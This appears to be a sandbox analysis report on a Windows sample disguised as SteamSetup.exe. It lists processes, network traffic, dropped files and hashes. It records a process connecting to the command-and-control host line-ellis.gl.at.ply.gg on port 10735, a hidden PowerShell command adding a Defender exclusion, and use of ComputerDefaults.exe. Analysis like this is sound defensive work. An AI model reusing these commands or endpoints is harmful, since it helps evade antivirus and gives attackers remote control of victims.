"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

"C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

"PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 416 -p 1660 -ip 1660

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1660 -s 3976

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 404 -p 2876 -ip 2876

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2876 -s 3564

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 512 -p 1812 -ip 1812

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1812 -s 3500

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 5012 -ip 5012

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5012 -s 3564

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 528 -p 2980 -ip 2980

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2980 -s 3540

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 line-ellis.gl.at.ply.gg udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 202.74.101.95.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

memory/1684-133-0x0000000000A80000-0x0000000000CE0000-memory.dmp

memory/1684-134-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1684-135-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1684-136-0x0000000001590000-0x00000000015A0000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

memory/4924-148-0x000001EF5B460000-0x000001EF5B48E000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

memory/4924-150-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3940-158-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

memory/1684-163-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1772-164-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/1772-165-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\System.dll

MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

memory/1772-167-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\nsDialogs.dll

MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\nsDialogs.dll

MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xm0fsxu5.dgw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3940-194-0x0000000004DD0000-0x0000000004E62000-memory.dmp

memory/1772-184-0x00000240F3B40000-0x00000240F3B62000-memory.dmp

memory/3940-195-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/3940-196-0x0000000004E80000-0x0000000004F1C000-memory.dmp

memory/4924-197-0x000001EF759D0000-0x000001EF759E0000-memory.dmp

memory/3940-198-0x0000000005000000-0x0000000005010000-memory.dmp

memory/3940-199-0x00000000056D0000-0x0000000005C74000-memory.dmp

memory/1772-200-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

memory/3940-201-0x0000000005590000-0x00000000055F6000-memory.dmp

memory/3940-204-0x0000000005E80000-0x0000000005ED0000-memory.dmp

memory/3232-218-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3232-219-0x000002CD01CC0000-0x000002CD01CD0000-memory.dmp

memory/1772-220-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

memory/1772-224-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/4924-227-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3232-228-0x000002CD01CC0000-0x000002CD01CD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3232-231-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

memory/3940-232-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4924-233-0x000001EF759D0000-0x000001EF759E0000-memory.dmp

memory/2992-234-0x0000000002B00000-0x0000000002B01000-memory.dmp

memory/1660-241-0x0000022F16100000-0x0000022F16120000-memory.dmp

memory/1660-244-0x0000022F15DB0000-0x0000022F15DD0000-memory.dmp

memory/1660-248-0x0000022F164C0000-0x0000022F164E0000-memory.dmp

memory/3940-249-0x0000000005000000-0x0000000005010000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

MD5 402e0c5b12db3a5ffb0bece9995d459b
SHA1 f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2
SHA256 6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2
SHA512 5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

memory/2876-263-0x00000217C82A0000-0x00000217C82C0000-memory.dmp

memory/2876-265-0x00000217C8260000-0x00000217C8280000-memory.dmp

memory/2876-267-0x00000217C8880000-0x00000217C88A0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

MD5 402e0c5b12db3a5ffb0bece9995d459b
SHA1 f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2
SHA256 6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2
SHA512 5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

MD5 402e0c5b12db3a5ffb0bece9995d459b
SHA1 f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2
SHA256 6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2
SHA512 5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

memory/1812-284-0x000001F22CB80000-0x000001F22CBA0000-memory.dmp

memory/1812-288-0x000001F22CB40000-0x000001F22CB60000-memory.dmp

memory/1812-291-0x000001F22CF50000-0x000001F22CF70000-memory.dmp

memory/5012-298-0x0000028470A60000-0x0000028470A80000-memory.dmp

memory/5012-303-0x0000028470E20000-0x0000028470E40000-memory.dmp

memory/5012-301-0x0000028470A20000-0x0000028470A40000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

MD5 402e0c5b12db3a5ffb0bece9995d459b
SHA1 f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2
SHA256 6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2
SHA512 5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

memory/2980-319-0x0000015F3CE50000-0x0000015F3CE70000-memory.dmp

memory/2980-325-0x000001673E420000-0x000001673E440000-memory.dmp

memory/2980-323-0x0000015F3CE10000-0x0000015F3CE30000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

MD5 8aaad0f4eb7d3c65f81c6e6b496ba889
SHA1 231237a501b9433c292991e4ec200b25c1589050
SHA256 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA512 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe

MD5 94b56d65a8b7f7253aeacac345d4b096
SHA1 7e11e248ae804d3647479a4fe5f03835a1eee4bc
SHA256 0f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be
SHA512 538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055